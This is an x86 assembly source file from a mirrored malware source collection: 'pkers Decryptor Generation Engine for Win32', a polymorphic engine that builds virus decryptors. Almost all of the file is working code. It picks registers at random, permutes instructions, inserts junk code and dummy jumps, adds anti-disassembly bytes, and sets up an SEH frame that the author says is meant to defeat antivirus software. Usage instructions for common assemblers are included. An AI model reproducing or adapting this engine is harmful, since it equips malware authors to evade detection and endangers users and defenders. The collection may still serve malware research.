mirror of
https://github.com/vxunderground/MalwareSourceCode.git
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929 lines
34 KiB
PHP
929 lines
34 KiB
PHP
;
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; pker's Decryptor Generation Engine for Win32 (PKDGE32)
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; ======================================================
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;
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;
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; Description
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; -----------
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;
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; I wanted to code a polymorphic engine when I first started coding this. Then
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; I got the idea of generating decrypt code dynamically instead of morphing the
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; original decrypt code. The generated decryptor uses random registerz, with
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; junk code inserted, and it's instruction-permutable. When coding, I found
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; that the name 'decrypt generation engine' is more appropriate than a poly-
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; morphic engine, so I renamed it to PKDBE32.
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;
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; Generally, the decrypt code looks like the following:
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;
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; mov Rw,offset code2decrypt ; (1)
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; mov Rz,decrypt_size ; (2)
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; decrypt_loop: xor byte [Rw],imm8 ; (3)
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; inc Rw ; (4)
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; dec Rz ; (5)
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; jnz decrypt_loop ; (6)
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;
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; As we can see, I used Rx, Ry, Rz in the code above, instead of EAX, EBX, ...
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; this means the we can use random registerz in the decrypt code. The engine
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; can select random registerz to generate each instruction. Meanwhile, the
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; first 2 instructionz are permutable, so the engine will put the 2 instruc-
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; tionz in a random order. Also, we know that some of the instructionz can be
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; replaced by other instructionz that performed the same. For example, we can
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; use PUSH/POP to replace MOV XXX/XXX, etc. Last but important, is, the engine
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; will insert junk codez after each instructionz.
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;
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; One more thing, the engine setup a SEH frame before the decrypt code in order
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; to fuck some AVsoftz. And of course, there're also junk codez between these
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; instructionz.
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;
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; The SEH frame's like the following code:
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;
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; start: call setup_seh ; (1)
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; mov esp,[esp+8] ; (2)
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; jmp end_seh ; (3)
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; setup_seh: xor Rx,Rx ; (4)
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; push dword [fs:Rx] ; (5)
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; mov [fs:Rx],esp ; (6)
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; dec dword [Rx] ; (7)
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; jmp start ; (8)
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; end_seh: xor Ry,Ry ; (9)
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; pop dword [fs:Ry] ; (10)
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; pop Rz ; (11)
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;
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; Then comes the real decrypt code (generated by this engine).
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;
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;
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; How to use it?
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; --------------
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;
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; This engine can compile with FASM, TASM and MASM, etc.
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;
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; When using FASM we can:
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;
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; decryptor: times 40h db 90h
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; crypt_code: ...
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; crypted_size = $-crypt_code
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; rng_seed dd ?
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;
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; gen_decrytpor: mov edi,decryptor
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; mov esi,rng_seed
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; mov ebx,crypt_code
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; mov ecx,crypted_size
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; mov edx,9ah
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; call __pkdge32
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;
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; When using TASM or MASM we should:
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;
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; decryptor db 40h dup (90h)
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; crypt_code: ...
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; crypted_size = $-crypt_code
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; rng_seed dd ?
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;
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; gen_decrytpor: mov edi,offset decryptor
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; mov esi,offset rng_seed
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; mov ebx,offset crypt_code
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; mov ecx,crypted_size
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; mov edx,9ah
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; call __pkdge32
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;
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; One more feature, the engine returns the address of the code2decrypt field in
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; the decryptor, so we can fix this value after generating the decryptor. This
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; means we can replace the code which to be decrypt anywhere after generating
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; the decrypt code. We can replace our code which to be decrypted just after
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; the decryptor, without padding so many NOPz between them :P
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;
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; We could code like this:
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;
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; col_code: times crypted_size+200h db 0
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;
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; gen_decrytpor: mov edi,col_code
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; mov esi,rng_seed
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; mov ecx,crypted_size
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; mov ebx,12345678h
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; mov edx,12345678h
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; call __pkdge32
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; fix_address: mov esi,edi
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; xchg eax,edi
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; stosd
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; xchg esi,edi
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; copy_code: mov esi,crypt_code
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; mov ecx,crypted_size
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; rep movsb
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;
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; Well, enjoy it!
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;
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;
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; Copyright
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; ---------
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;
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; (c) 2004. No rightz reserved. Use without permission :P.
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;
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;
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; __pkdge32 procedure
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; ===================
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;
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;
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; Description
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; -----------
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;
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; This is the main procedure of the engine. It controlz the whole generation
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; process, including SEH setup, instruction generation, junk code insertion,
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; etc.
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;
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;
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; Parameterz and Return Value
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; ---------------------------
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;
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; Input:
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; ecx --- decrypt buffer size (counter in bytez)
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; edx --- decrypt key
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; edi --- pointz to the buffer to save decryptor
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; ebx --- pointz to the buffer where saved the encrypted code
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; esi --- pointz to the RNG seed buffer
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;
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; Output:
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; edi --- the end of the decryptor
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; eax --- pointz to the address of the code which will be decrypted in
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; the decryptor, this means we can place the code which will be
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; decrypted anywhere by fixing the value pointed by EAX
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;
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__pkdge32: pushad
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xor ebp,ebp
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xchg esi,edi ; initialize the RNG seed
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call __randomize ; ...
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xchg esi,edi ; ...
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;
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; First, we select four random registerz for later use. These four registerz
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; are all different
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;
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xor ebx,ebx ; used to save Rw, Rz, Rx, Ry
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call pkdg_sel_reg
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or bl,al
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call pkdg_sel_reg
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shl ebx,4
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or bl,al
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call pkdg_sel_reg
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shl ebx,4
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or bl,al
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call pkdg_sel_reg
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shl ebx,4
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or bl,al
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;
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; We setup a SEH frame, then we raise an exception and run the following codez.
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; This action may fuck some of the AVsoftz.
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;
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push edi
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xor eax,eax ; some junk code
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call __pkdge32_junk ; ...
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mov al,0e8h ; seh instruction 1
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stosb ; ...
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stosd ; addr 1, no matter what, fix l8r
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push edi ; save addr1 to fix
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xor eax,eax ; some junk code
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call __pkdge32_junk ; ...
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mov eax,0824648bh ; seh instruction 2
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stosd ; ...
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xor eax,eax ; some junk code
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call __pkdge32_junk ; ...
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mov al,0ebh ; seh instruction 3
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stosb ; ...
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stosb ; addr 2, no matter what, fix l8r
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push edi ; save addr2 to fix
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mov eax,[esp+4] ; fix addr1
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xchg edi,eax ; ...
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sub eax,edi ; ...
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sub edi,4 ; ...
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stosd ; ...
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add edi,eax ; ...
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xor eax,eax ; some junk code
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call __pkdge32_junk ; ...
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mov ah,bl ; seh instruction 4
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and ah,7 ; ...
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or eax,0c031h ; ...
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push ebx ; ...
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and ebx,7 ; ...
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shl ebx,11 ; ...
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or eax,ebx ; ...
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pop ebx ; ...
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stosw ; ...
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xor eax,eax ; some junk code
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call __pkdge32_junk ; ...
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mov eax,0ff64h ; seh instruction 5
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stosw ; ...
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mov al,bl ; ...
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and eax,7 ; ...
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or al,30h ; ...
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stosb ; ...
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xor eax,eax ; some junk code
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call __pkdge32_junk ; ...
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mov eax,8964h ; seh instruction 6
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stosw ; ...
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mov al,bl ; ...
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and eax,7 ; ...
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or al,20h ; ...
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stosb ; ...
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xor eax,eax ; some junk code
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call __pkdge32_junk ; ...
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mov ah,bl ; seh instruction 7
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and eax,700h ; ...
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or eax,08ffh ; ...
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stosw ; ...
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xor eax,eax ; some junk code
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call __pkdge32_junk ; ...
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mov al,0ebh ; seh instruction 8
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stosb ; ...
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mov eax,[esp+8] ; ...
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sub eax,edi ; ...
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dec eax ; ...
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stosb ; ...
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xor eax,eax ; some junk code
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call __pkdge32_junk ; ...
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pop eax ; fix addr2
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xchg eax,edi ; ...
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sub eax,edi ; ...
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dec edi ; ...
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stosb ; ...
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add edi,eax ; ...
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mov ah,bh ; seh instruction 9
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and eax,700h ; ...
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or eax,0c031h ; ...
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push ebx ; ...
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and ebx,700h ; ...
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shl ebx,3 ; ...
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or eax,ebx ; ...
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pop ebx ; ...
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stosw ; ...
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xor eax,eax ; some junk code
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call __pkdge32_junk ; ...
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mov eax,8f64h ; seh instruction 10
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stosw ; ...
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mov al,bh ; ...
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and eax,7 ; ...
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stosb ; ...
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xor eax,eax ; some junk code
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call __pkdge32_junk ; ...
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mov al,bh ; seh instruction 11
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and al,7 ; ...
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or al,58h ; ...
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stosb ; ...
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xor eax,eax ; some junk code
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call __pkdge32_junk ; ...
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add esp,8 ; balance the stack
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;
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; Now, generate the first two instructionz with junk codez between them, and
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; permute the two instructionz in a random order.
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;
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mov ecx,2
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call __random_rdtsc
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or ecx,ecx
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jz pkdg_gen_12
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call pkdg_gen_1
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call pkdg_gen_2
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jmp pkdg_gen_f2f
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pkdg_gen_12: call pkdg_gen_2
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call pkdg_gen_1
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;
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; The last step, we generate the last four instructionz with junk codez in them
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; these four instructionz must in the same order, but the registerz they use
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; are still random
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;
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pkdg_gen_f2f: mov esi,[esp+4] ; restore ESI
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push edi ; save loop address
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push esi
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mov eax,ebx ; xor byte [Rw],Imm8
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shr eax,12 ; ...
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and al,7 ; ...
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mov esi,[esp+28] ; ...
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call __pkdge32_gen_xor_reg_imm
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pop esi
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xor eax,eax
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call __pkdge32_junk
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mov eax,ebx ; inc Rw
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shr eax,12 ; ...
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and eax,7 ; ...
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or al,40h
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stosb
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xor eax,eax
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call __pkdge32_junk
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mov eax,ebx ; dec Rz
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shr eax,4 ; ...
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and eax,7 ; ...
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or al,48h ; ...
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stosb ; ...
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pop eax ; jnz decrypt_loop
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sub eax,edi ; get delta
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dec eax ; ...
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dec eax ; ...
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push eax
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mov al,75h ; write opcode
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stosb ; ...
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pop eax
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stosb ; write operand
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xor eax,eax
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call __pkdge32_junk
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mov [esp],edi ; save new EDI
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popad
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ret
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pkdg_gen_1: mov esi,[esp+20] ; get offset code2decrypt
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mov eax,ebx ; get Rw
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shr eax,12 ; ...
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call pkdge32_gen12
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mov [esp+32],eax ; save offset of code2decrypt
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ret
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pkdg_gen_2: mov esi,[esp+28] ; get decrypt_size
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mov eax,ebx ; get Rz
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shr eax,4 ; ...
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and eax,0fh ; ...
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call pkdge32_gen12
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ret
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;
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; Using this function to generate the first two instructionz of the decryptor,
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; which are permutable
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;
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pkdge32_gen12: push ecx
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push eax ; save mask
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mov ecx,2 ; determine using MOV REG/IMM
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call __random_rdtsc ; or PUSH IMM/POP REG
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or eax,eax
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pop eax ; restore mask
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pop ecx
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jz pkdg_g123_0
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call __pkdge32_gen_mov_reg_imm
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push edi
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xor eax,eax
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mov esi,[esp+16]
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call __pkdge32_junk
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pop eax
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sub eax,4
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ret
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pkdg_g123_0: call __pkdge32_gen_pushimm_popreg
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push eax
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xor eax,eax
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mov esi,[esp+16]
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call __pkdge32_junk
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pop eax
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sub eax,4
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ret
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;
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; This procudure selectz the random register Rw, Rx, Ry, Rz. The function will
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; make EBX to the following structure:
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;
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; 31 15 0
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; +-----+-----+-----+-----+------+------+------+------+
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; | 0 | 0 | 0 | 0 | Rw | Ry | Rz | Rx |
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; +-----+-----+-----+-----+------+------+------+------+
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;
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pkdg_sel_reg: mov eax,[esp+8] ; select random register
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mov edx,8 ; ...
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call __random ; ...
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or al,al
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jz pkdg_sel_reg ; don't use EAX
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cmp al,4
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jz pkdg_sel_reg ; don't use ESP
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cmp al,5
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jz pkdg_sel_reg ; don't use EBP
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or al,8 ; DWORD type
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push ebx
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and ebx,0fh
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cmp bl,al ; R == Rx ?
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pop ebx
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jz pkdg_sel_reg
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push ebx
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shr ebx,4
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and ebx,0fh
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cmp bl,al ; R == Rz ?
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pop ebx
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jz pkdg_sel_reg
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push ebx
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shr ebx,8
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cmp bl,al ; R == Ry ?
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pop ebx
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jz pkdg_sel_reg
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push ebx
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shr ebx,12
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cmp bl,al ; R == Rw ?
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pop ebx
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jz pkdg_sel_reg
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ret
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;
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; __pkdge32_test_regmask procedure
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; ================================
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;
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;
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; Description
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; -----------
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;
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; All the register mask in the engine (PKDGE32) measure up this formula:
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; bit 2~0 specifies the register mask, bit 8 and bit 3 specifies the type of
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; the operand
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;
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; +-------+-------+--------+
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; | bit 8 | bit 3 | type |
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; +-------+-------+--------+
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; | x | 0 | byte |
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; +-------+-------+--------+
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; | 0 | 1 | dword |
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; +-------+-------+--------+
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; | 1 | 1 | word |
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; +-------+-------+--------+
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;
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; This function test this mask, if it specified a WORD type, the function STOSB
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; an accessorial opcode 66H. If it specified a BYTE or DWORD type, function do
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; nothing but return
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;
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;
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; Parameterz and Return Value
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; ---------------------------
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;
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; Input:
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; eax --- register mask
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; edi --- pointz to the buffer to save the instructionz
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;
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; Output:
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; Nothing
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;
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__pkdge32_test_regmask:
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test ah,1
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jz pkdg_trm_ret
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push eax
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mov al,66h
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stosb
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pop eax
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pkdg_trm_ret: ret
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;
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; __pkdge32_gen_mov_reg_imm procedure
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; ===================================
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;
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;
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; Description
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; -----------
|
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;
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; This function generatez MOV REG,IMM type of instructionz.
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;
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;
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; Parameterz and Return Value
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; ---------------------------
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;
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; Input:
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; eax --- register mask
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; edi --- pointz to the buffer to save the instructionz
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; esi --- immediate number (source operand)
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;
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; Output:
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; Generate a instruction in the buffer EDI pointed, EDI pointz to the new
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; position in the buffer
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;
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__pkdge32_gen_mov_reg_imm:
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call __pkdge32_test_regmask
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push esi
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or al,0b0h ; generate opcode
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stosb ; ...
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xchg eax,esi ; EAX get the operand
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shr esi,4
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jc pkdg_gmri_dw ; word/dword ? byte ?
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stosb ; byte
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pop esi
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ret
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pkdg_gmri_dw: shr esi,5
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pop esi
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jc pkdg_gmri_w
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stosd ; dword
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ret
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pkdg_gmri_w: stosw ; word
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ret
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;
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; __pkdge32_gen_pushimm_popreg procedure
|
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; ======================================
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;
|
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;
|
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; Description
|
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; -----------
|
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;
|
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; This function generatez PUSH IMM/POP REG group instructionz.
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;
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;
|
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; Parameterz and Return Value
|
|
; ---------------------------
|
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;
|
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; Input:
|
|
; eax --- register mask
|
|
; edi --- pointz to the buffer to save the instructionz
|
|
; esi --- immediate number (source operand)
|
|
;
|
|
; Output:
|
|
; Generate a instruction in the buffer EDI pointed, EDI pointz to the new
|
|
; position in the buffer
|
|
;
|
|
|
|
__pkdge32_gen_pushimm_popreg:
|
|
call __pkdge32_test_regmask
|
|
push ecx
|
|
mov ecx,esi ; save IMM in ecx
|
|
xchg esi,eax
|
|
test esi,8 ; test BYTE or WORD/DWORD
|
|
jz pkdg_gpp_b
|
|
mov al,68h ; push WORD/DWORD
|
|
stosb ; write opcode
|
|
xchg eax,ecx ; get IMM
|
|
test esi,100h ; test WORD or DWORD
|
|
jnz pkdg_gpp_w
|
|
stosd ; write operand
|
|
jmp pkdg_gpp_pop
|
|
pkdg_gpp_w: stosw
|
|
jmp pkdg_gpp_pop
|
|
pkdg_gpp_b: mov al,6ah ; push BYTE
|
|
stosb ; write opcode
|
|
mov al,cl ; get IMM
|
|
stosb ; write operand
|
|
pkdg_gpp_pop: push edi
|
|
xor eax,eax
|
|
push esi
|
|
mov esi,[esp+28]
|
|
call __pkdge32_junk
|
|
pop esi
|
|
call __pkdge32_test_regmask
|
|
xchg esi,eax
|
|
or al,58h ; generate POP opcode
|
|
stosb ; write pop REG opcode
|
|
pop eax
|
|
pop ecx
|
|
ret
|
|
|
|
|
|
;
|
|
; __pkdge32_gen_xor_reg_imm procedure
|
|
; ===================================
|
|
;
|
|
;
|
|
; Description
|
|
; -----------
|
|
;
|
|
; This function generatez XOR [REG],IMM type of instructionz.
|
|
;
|
|
;
|
|
; Parameterz and Return Value
|
|
; ---------------------------
|
|
;
|
|
; Input:
|
|
; eax --- register mask
|
|
; esi --- the immediate number
|
|
; edi --- pointz to the buffer to save the instructionz
|
|
;
|
|
; Output:
|
|
; Generate a instruction in the buffer EDI pointed, EDI pointz to the new
|
|
; position in the buffer
|
|
;
|
|
|
|
__pkdge32_gen_xor_reg_imm:
|
|
call __pkdge32_test_regmask
|
|
test al,1000b
|
|
jnz pkdg_gxri_dw
|
|
and eax,7 ; register mask
|
|
xchg al,ah
|
|
or eax,3080h
|
|
stosw
|
|
xchg eax,esi
|
|
stosb
|
|
ret
|
|
pkdg_gxri_dw: push eax
|
|
and eax,7 ; register mask
|
|
xchg al,ah
|
|
or eax,3081h
|
|
stosw
|
|
xchg eax,esi
|
|
pop esi
|
|
shr esi,9
|
|
jc pkdg_gxri_w
|
|
stosd ; dword
|
|
ret
|
|
pkdg_gxri_w: stosw ; word
|
|
ret
|
|
|
|
|
|
;
|
|
; __pkdge32_junk procedure
|
|
; ========================
|
|
;
|
|
;
|
|
; Decription
|
|
; ----------
|
|
;
|
|
; This is the junk code generator. It generatez length-spceified instructionz,
|
|
; dummy jumpz and anti-static-debugging opcodez.
|
|
;
|
|
; This procedure use EAX as junk register in order to generate instructionz
|
|
; like:
|
|
;
|
|
; mov eax,21343ab7h
|
|
; shr eax,8
|
|
; or:
|
|
; push eax
|
|
; rol eax,1
|
|
; pop eax
|
|
; etc.
|
|
;
|
|
; It generatez dummy jumpz such as:
|
|
;
|
|
; call @1
|
|
; junk
|
|
; jmp @3
|
|
; @2: junk
|
|
; ret
|
|
; @1: junk
|
|
; jmp @2
|
|
; @3: junk
|
|
;
|
|
; It also generatez anti-static-debugging opcodez such as:
|
|
;
|
|
; jmp @0
|
|
; db e9h
|
|
; @@:
|
|
;
|
|
;
|
|
; Parameterz and Return Value
|
|
; ---------------------------
|
|
;
|
|
; Input:
|
|
; eax --- If eax equalz to zero, the function generatez random length of
|
|
; instructionz, if eax is nonzero, the function generatez a
|
|
; certain length of instruction.
|
|
; esi --- pointz to the RNG seed buffer
|
|
; edi --- pointz to the buffer to save the instructionz
|
|
;
|
|
; Output:
|
|
; Nothing but junk codez in the buffer that EDI specified
|
|
;
|
|
|
|
__pkdge32_junk: pushad
|
|
xor ebx,ebx
|
|
xchg esi,ebp ; let EBP hold the seed ptr.
|
|
or eax,eax ; EAX containz number from 0~7
|
|
jnz pkdg_js ; 0~5: gen. 0~5 bytez of junk codez
|
|
mov edx,7 ; 6: generate dummy jumpz
|
|
mov eax,ebp
|
|
call __random ; ...
|
|
pkdg_js: or eax,eax ; 0: nothing to do
|
|
jz pkdg_j_ret ; just go back
|
|
xchg ecx,eax ; let ECX hold that number
|
|
cmp ecx,6
|
|
jz pkdg_j_dj
|
|
|
|
;
|
|
; Generate certain length simpile instructionz
|
|
;
|
|
|
|
pkdg_j_gclsi: mov edx,ecx
|
|
mov eax,ebp
|
|
call __random
|
|
or eax,eax
|
|
jz pkdg_j_g1b
|
|
dec eax
|
|
jz pkdg_j_g2b
|
|
dec eax
|
|
jz pkdg_j_g3b
|
|
dec eax
|
|
dec eax
|
|
jz pkdg_j_g5b
|
|
jmp pkdg_j_gclsi
|
|
|
|
;
|
|
; Generate 5-byte instruction
|
|
;
|
|
|
|
pkdg_j_g5b: call pkdg_j_5
|
|
db 0b8h ; mov eax,imm32
|
|
db 05h ; add eax,imm32
|
|
db 15h ; adc eax,imm32
|
|
db 2dh ; sub eax,imm32
|
|
db 1dh ; sbb eax,imm32
|
|
db 3dh ; cmp eax,imm32
|
|
db 0a9h ; test eax,imm32
|
|
db 0dh ; or eax,imm32
|
|
db 25h ; and eax,imm32
|
|
db 35h ; xor eax,imm32
|
|
pkdg_j_5: pop esi
|
|
mov eax,ebp
|
|
mov edx,10
|
|
call __random
|
|
add esi,eax
|
|
movsb
|
|
mov eax,ebp
|
|
mov edx,0fffffffch
|
|
call __random
|
|
inc eax
|
|
inc eax
|
|
stosd
|
|
sub ecx,5 ; decrease counter
|
|
jz pkdg_j_rptr
|
|
jmp pkdg_j_gclsi
|
|
|
|
;
|
|
; Generate 3-byte instruction
|
|
;
|
|
|
|
pkdg_j_g3b: call pkdg_j_3
|
|
db 0c1h,0e0h ; shl eax,imm8
|
|
db 0c1h,0e8h ; shr eax,imm8
|
|
db 0c1h,0c0h ; rol eax,imm8
|
|
db 0c1h,0c8h ; ror eax,imm8
|
|
db 0c1h,0d0h ; rcl eax,imm8
|
|
db 0c1h,0d8h ; rcr eax,imm8
|
|
db 0c0h,0e0h ; shl al,imm8
|
|
db 0c0h,0e8h ; shr al,imm8
|
|
db 0c0h,0c0h ; rol al,imm8
|
|
db 0c0h,0c8h ; ror al,imm8
|
|
db 0c0h,0d0h ; rcl al,imm8
|
|
db 0c0h,0d8h ; rcr al,imm8
|
|
db 0ebh,01h ; anti-static-debugging instr.
|
|
pkdg_j_3: pop esi
|
|
mov eax,ebp
|
|
mov edx,13
|
|
call __random
|
|
shl eax,1 ; EAX *= 2
|
|
add esi,eax
|
|
movsw
|
|
cmp eax,24
|
|
jge pkdg_j3_anti
|
|
mov eax,ebp
|
|
mov edx,14
|
|
call __random
|
|
inc eax
|
|
inc eax
|
|
pkdg_j_3f: stosb
|
|
sub ecx,3 ; decrease counter
|
|
jz pkdg_j_rptr
|
|
jmp pkdg_j_gclsi
|
|
pkdg_j3_anti: mov eax,ebp
|
|
mov edx,10h
|
|
call __random
|
|
add al,70h
|
|
jmp pkdg_j_3f
|
|
|
|
;
|
|
; Generate 2-byte instruction
|
|
;
|
|
|
|
pkdg_j_g2b: call pkdg_j_2
|
|
db 89h ; mov eax,reg
|
|
db 01h ; add eax,reg
|
|
db 11h ; adc eax,reg
|
|
db 29h ; sub eax,reg
|
|
db 19h ; sbb eax,reg
|
|
db 39h ; cmp eax,reg
|
|
db 85h ; test eax,reg
|
|
db 09h ; or eax,reg
|
|
db 21h ; and eax,reg
|
|
db 31h ; xor eax,reg
|
|
db 0b0h ; mov al,imm8
|
|
db 04h ; add al,imm8
|
|
db 14h ; adc al,imm8
|
|
db 2ch ; sub al,imm8
|
|
db 1ch ; sbb al,imm8
|
|
db 3ch ; cmp al,imm8
|
|
db 0a8h ; test al,imm8
|
|
db 0ch ; or al,imm8
|
|
db 24h ; and al,imm8
|
|
db 34h ; xor al,imm8
|
|
pkdg_j_2: pop esi
|
|
mov eax,ebp
|
|
mov edx,20
|
|
call __random
|
|
add esi,eax
|
|
movsb ; write the opcode
|
|
cmp eax,10
|
|
jge pkdg_j2_imm8
|
|
mov eax,ebp
|
|
mov edx,8
|
|
call __random
|
|
shl eax,3 ; dest. operand
|
|
or al,0c0h ; ...
|
|
jmp pkdg_j2_f
|
|
pkdg_j2_imm8: mov eax,ebp
|
|
mov edx,100h
|
|
call __random
|
|
pkdg_j2_f: stosb
|
|
dec ecx ; decrease counter
|
|
dec ecx ; ...
|
|
jz pkdg_j_rptr
|
|
jmp pkdg_j_gclsi
|
|
|
|
;
|
|
; Generate 1-byte instruction
|
|
;
|
|
|
|
pkdg_j_g1b: call pkdg_j_1
|
|
db 90h ; nop
|
|
db 0f8h ; clc
|
|
db 0f9h ; stc
|
|
db 40h ; inc eax
|
|
db 48h ; dec eax
|
|
db 37h ; aaa
|
|
db 3fh ; aas
|
|
db 98h ; cbw
|
|
db 0fch ; cld
|
|
db 0f5h ; cmc
|
|
db 27h ; daa
|
|
db 2fh ; das
|
|
db 9fh ; lahf
|
|
db 0d6h ; salc
|
|
pkdg_j_1: pop esi
|
|
mov eax,ebp
|
|
mov edx,14
|
|
call __random
|
|
add esi,eax
|
|
movsb ; write the code
|
|
dec ecx ; decrease counter
|
|
or ecx,ecx
|
|
jnz pkdg_j_gclsi
|
|
pkdg_j_rptr: mov [esp],edi
|
|
pkdg_j_ret: popad
|
|
ret
|
|
|
|
;
|
|
; Generate dummy jumpz. the generation formula show in the decription of the
|
|
; __pkdge32_junk procedure
|
|
;
|
|
|
|
pkdg_j_dj: mov al,0e8h ; call xxxxxxxx
|
|
stosb ; ...
|
|
stosd ; addr1, no matter what, fix l8r
|
|
push edi
|
|
mov eax,ebp ; some more junx
|
|
mov edx,6 ; ...
|
|
call __random ; ...
|
|
mov esi,ebp ; ...
|
|
call __pkdge32_junk ; ...
|
|
mov al,0ebh ; jmp xx
|
|
stosb ; ...
|
|
stosb ; addr2, no matter what, fix l8r
|
|
push edi
|
|
mov eax,ebp ; some more junx
|
|
mov edx,6 ; ...
|
|
call __random ; ...
|
|
mov esi,ebp ; ...
|
|
call __pkdge32_junk ; ...
|
|
mov al,0c3h ; ret
|
|
stosb ; ...
|
|
mov eax,[esp+4] ; fix addr1
|
|
xchg eax,edi ; ...
|
|
sub eax,edi ; ...
|
|
sub edi,4 ; ...
|
|
stosd ; ...
|
|
add edi,eax ; ...
|
|
mov eax,ebp ; some more junx
|
|
mov edx,6 ; ...
|
|
call __random ; ...
|
|
mov esi,ebp ; ...
|
|
call __pkdge32_junk ; ...
|
|
mov al,0ebh ; jmp xx
|
|
stosb ; ...
|
|
mov eax,[esp] ; ...
|
|
sub eax,edi ; ...
|
|
dec eax ; ...
|
|
stosb ; ...
|
|
pop eax ; fix addr2
|
|
xchg eax,edi ; ...
|
|
sub eax,edi ; ...
|
|
dec edi ; ...
|
|
stosb ; ...
|
|
add edi,eax ; ...
|
|
pop eax ; pop a shit
|
|
mov eax,ebp ; some more junx
|
|
mov edx,6 ; ...
|
|
call __random ; ...
|
|
mov esi,ebp ; ...
|
|
call __pkdge32_junk ; ...
|
|
jmp pkdg_j_rptr
|